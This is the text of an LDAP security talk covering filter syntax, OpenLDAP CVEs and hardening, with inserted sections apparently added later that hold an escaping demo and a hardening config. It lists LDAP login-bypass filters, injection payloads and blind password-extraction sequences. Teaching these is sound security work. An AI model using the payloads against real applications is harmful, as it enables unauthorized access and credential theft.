LDAP Security - Emre Övünç

Post on 26-Jun-2020


LDAP Security
Emre ÖVÜNÇ

info@emreovunc.com

Who am I?

• Attack Developer – Picus Security
• Security Researcher – Synack

• OSCE – OSCP – OSWP
• LFCE – LFCS – ISO27001 LA

• https://github.com/EmreOvunc
• https://twitter.com/EmreOvunc

Lightweight Directory Access Protocol

• TCP/IP

• Client – Server

• X.500 Protocol (1988-1993) | OSI

What is LDAP?

• Protocol

• Database
• Organizations
• Units
• People
• Resources
• Devices

• Authentication mechanism

Aim?

• Access control
• Privacy
• Security
• Authentication

• User management
• Delegation
• Rights

• Scaling

OpenLDAP

Open-source, free, BSD-style license

OpenLDAP Components

• Slapd
• Daemon
• Receives connections

• Libraries & Utilities

• Client

LDAP Server

Ldap-utils Slapd Phpldapadmin Apache2 Bind9


LDAP Server Configuration

Search Parameters

ldapsearch -H ldap://172.16.155.128 -D "cn=admin,dc=ovunc,dc=local" -W

-H: LDAP Uniform Resource Identifier(s)
-D: bind DN
-W: prompt for bind password

DC: domain component
DN: distinguished name
CN: common name
OU: organizational unit name
UID: user id

LDAP Anonymous Authentication

LDAP Simple Authentication

LDAP Configuration

LDAP Simple Authentication

LDAP Anonymous Authentication

LDAP Configuration

LDAP Anonymous Authentication

Nmap LDAP Enumeration

Nmap LDAP Bruteforcing

LDAP Filters

Operator   Description                                   Example
=          Exact match                                   cn=admin
*          Wildcard: zero or more characters             ou=*
>=         Greater than or equal                         uid>=
<=         Less than or equal                            uid<=
=*         Presence: attribute has one or more values    cn=*
&          And                                           (&(filter)(filter)(filter))
|          Or                                            (|(filter)(filter)(filter))
!          Not                                           (!(filter))

LDAP Filters Example

• (&(objectClass=group)(cn=admin))

• (&(objectClass=posix)(cn=*team*))

• (&(objectClass=inetOrgPerson)(memberOf=cn=Admins,ou=redteam))

LDAP Web Application

<input type="text" name="user">Enter the username</input>

ldap_query = "(cn=" + $user + ")"

run(ldap_query)

???

LDAP Web Login Bypass

• (&(user=*)(password=*))

• (&(user=*))%00

• (&(user=*)(&))(password=*))

LDAP Injection Payloads

• *
• *)(&
• *))%00
• *()|%26'
• *()|&'
• *(|(mail=*))
• *(|(objectclass=*))
• *)(uid=*))(|(uid=*
• */*

LDAP Injection

(&(sn=admin)(password=*))
(&(sn=admin)(password=a*))
(&(sn=admin)(password=b*))
...
(&(sn=admin)(password=m*))
(&(sn=admin)(password=my*))
...
(&(sn=admin)(password=myPassw0rd))
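The filter table, the `(cn=" + $user + ")` web snippet and the bypass/injection slides above all come down to one point: when user input is concatenated into a filter, the user controls filter syntax rather than just a value. The following is an added example, not code from the slides or from the eLdap tool: a small in-memory evaluator for the filter grammar shown in the table (exact match, `*` wildcards, presence, `&`, `|`, `!`), used to contrast the slide's raw concatenation with a builder that applies RFC 4515 escaping. The directory entries and the inputs are constructed; `search()` deliberately ignores anything after the first complete filter, which models the lenient parsing the injection slides depend on.

```python
"""Minimal LDAP filter evaluator contrasting raw concatenation with RFC 4515
escaping. Added example, not code from the slides; directory and inputs are
constructed."""
import re

# Constructed directory standing in for the lab objects (single-valued attributes).
DIRECTORY = [
    {"uid": "admin", "cn": "admin", "objectClass": "inetOrgPerson", "ou": "people"},
    {"uid": "bob", "cn": "bob", "objectClass": "inetOrgPerson", "ou": "people"},
]

# RFC 4515 section 3: characters that must be hex-escaped inside an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input so it can only ever be read as a literal value."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(user: str) -> str:
    """The slide's pattern: the user controls filter syntax, not just a value."""
    return "(cn=" + user + ")"


def build_filter_safe(user: str) -> str:
    """Hardened form: escape first, then concatenate."""
    return "(cn=" + escape_filter_value(user) + ")"


def _parse(s: str, i: int):
    """Parse one parenthesised filter starting at s[i]; return (node, next index)."""
    if i >= len(s) or s[i] != "(":
        raise ValueError("expected '(' at %d" % i)
    i += 1
    if i < len(s) and s[i] in "&|":          # (&(f)(f)...) or (|(f)(f)...); (&) is an empty AND
        op, i, kids = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        node = (op, kids)
    elif i < len(s) and s[i] == "!":          # (!(f))
        kid, i = _parse(s, i + 1)
        node = ("!", kid)
    else:                                     # (attr=value); a literal ')' is always escaped as \29
        j = s.find(")", i)
        if j < 0 or "=" not in s[i:j]:
            raise ValueError("malformed assertion at %d" % i)
        attr, _, val = s[i:j].partition("=")
        return ("=", attr, val), j + 1
    if i >= len(s) or s[i] != ")":
        raise ValueError("expected ')' at %d" % i)
    return node, i + 1


def _value_regex(val: str):
    """Assertion value -> regex: an unescaped '*' is a wildcard; \\XX hex escapes
    become the literal character and are then regex-escaped."""
    pieces = [re.escape(re.sub(r"\\([0-9a-fA-F]{2})",
                               lambda m: chr(int(m.group(1), 16)), p))
              for p in val.split("*")]
    return re.compile("^" + ".*".join(pieces) + "$", re.DOTALL)


def _match(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(_match(k, entry) for k in node[1])
    if kind == "|":
        return any(_match(k, entry) for k in node[1])
    if kind == "!":
        return not _match(node[1], entry)
    _, attr, val = node
    value = entry.get(attr)
    return value is not None and _value_regex(val).match(value) is not None


def search(filter_str: str) -> list:
    """Return the uids matching filter_str. Only the first complete filter is
    evaluated; a trailing remainder is ignored, which models the lenient parsing
    the injection slides rely on (a strict server would reject the request)."""
    node, _end = _parse(filter_str, 0)
    return [e["uid"] for e in DIRECTORY if _match(node, e)]


def demo(user_input: str = "*"):
    """Same constructed input through both builders: the unsafe filter becomes a
    presence test and matches every entry, the safe one matches nobody because
    the asterisk was escaped to the literal \\2a."""
    return search(build_filter_unsafe(user_input)), search(build_filter_safe(user_input))


if __name__ == "__main__":
    print(demo())          # (['admin', 'bob'], [])
```

The escaping in `escape_filter_value` is the input-validation step listed under "LDAP Hardening" below; a real application should use the escaping helper of its LDAP library rather than a hand-written table, but the five characters are the same. Note that escaping only protects the value position: attribute names or whole filters coming from the user still have to be checked against an allow-list.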

LDAP Injection Question ?

(&(objectClass=[class name])(ou=[unit name]))

(&(objectClass=posix)(ou=redteam))

LDAP Injection Answer

(&(objectClass=[class name])(ou=[unit name]))

(&(objectClass=*)(objectClass=*)(ou=*))

(&(objectClass=*)(objectClass=*))(&(objectClass=foo)(ou=*))

(&(objectClass=*)(objectClass=*))(&(objectClass=people)(ou=redteam))

LDAP Injection Question ?

(&(deviceid=[id])(cn=[device name]))

(&(deviceid=34)(cn=nasbackup))

LDAP Injection Answer

(&(deviceid=[id])(cn=[device name]))

(&(deviceid=34)(ou=a*)(cn=nasbackup))
(&(deviceid=34)(ou=b*)(cn=nasbackup))
…
(&(deviceid=34)(ou=re*)(cn=nasbackup))
…
(&(deviceid=34)(ou=redteam)(cn=nasbackup))

LDAP Hardening

Input validation (ldap queries)

Least privilege (users & devices)

AppArmor & SELinux configurations

LDAPs (secure connection)

Backup (encrypt & sign)

LDAP Server Hardening

Reject requests from:
• No password
• Null password
• Unauthenticated
• Anonymous users/sessions

Do not use:
• SHA-1
• LDAPv2
• Weak passwords
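One way to apply the server-side bullets above on an OpenLDAP 2.4 host with cn=config: this is an added example, not configuration from the slides or from the OpenLDAP project, and the strength values are assumptions for a lab server. `olcDisallows`, `olcRequires`, `olcSecurity`, `olcLocalSSF`, `olcTLSProtocolMin` and `olcPasswordHash` are standard cn=config attributes; `{SSHA512}` assumes the pw-sha2 contrib module has been loaded first (keep `{SSHA}` if it is not).

```ldif
# Added example: cn=config changes implementing "reject anonymous and
# unauthenticated binds, require LDAPv3 and encryption, avoid SHA-1".
dn: cn=config
changetype: modify
replace: olcDisallows
# refuse anonymous binds; unauthenticated binds (DN with an empty password)
# are already refused unless bind_anon_cred is explicitly allowed
olcDisallows: bind_anon
-
replace: olcRequires
# every operation needs an authenticated session and protocol version 3
olcRequires: authc LDAPv3
-
replace: olcLocalSSF
# ldapi:/// sessions default to ssf 71; raise it first or the ssf=128 rule
# below locks out local EXTERNAL administration
olcLocalSSF: 128
-
replace: olcSecurity
# require 128-bit session protection (TLS) for every operation, and for
# simple binds in particular, so passwords never cross the wire in clear
olcSecurity: ssf=128 simple_bind=128
-
replace: olcTLSProtocolMin
# TLS 1.2 or newer
olcTLSProtocolMin: 3.3
-
replace: olcPasswordHash
# assumes olcModuleLoad: pw-sha2 is already present; otherwise use {SSHA}
olcPasswordHash: {SSHA512}
```

Apply it over the local socket with `ldapmodify -Y EXTERNAL -H ldapi:/// -f hardening.ldif` after TLS certificates are configured, then check that an anonymous `ldapwhoami -x -H ldap://<server>` is refused and that `ldapwhoami -x -D "cn=admin,dc=ovunc,dc=local" -W -H ldap://<server>` fails until `-ZZ` (STARTTLS) or an `ldaps://` URI is used.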

CVE-2019-13057

• OpenLDAP before 2.4.48
• Administrator delegation -> rootDN
• Slapd service
• Authorization
• CVSS 4.9 (NVD)

CVE-2019-13565

• OpenLDAP 2.x before 2.4.48
• SASL authentication
• Session encryption
• ACL configuration
• Successful authorization (different user)
• CVSS 7.5 (NVD)

Lab

LDAP Lab Objects

LDAP Lab Objects

Organization: redteam

Organization Unit: people

Posix Group: nettim

Users: admin, bob

Demo Time

LDAP Tool

• git clone https://github.com/EmreOvunc/eLdap-Ldap-Search-and-Filter.git

• cd eLdap-Ldap-Search-and-Filter
• sudo pip3 install virtualenv
• source myvenv/bin/activate
• python3 manage.py runserver

LDAP Tool Vuln.

LDAP Tool Attack… not yet!

References

• https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

• https://ldap.com/ldap-filters/

• https://www.cvedetails.com/vulnerability-list/vendor_id-439/Openldap.html

Emre ÖVÜNÇ

info@emreovunc.com 16/04/2020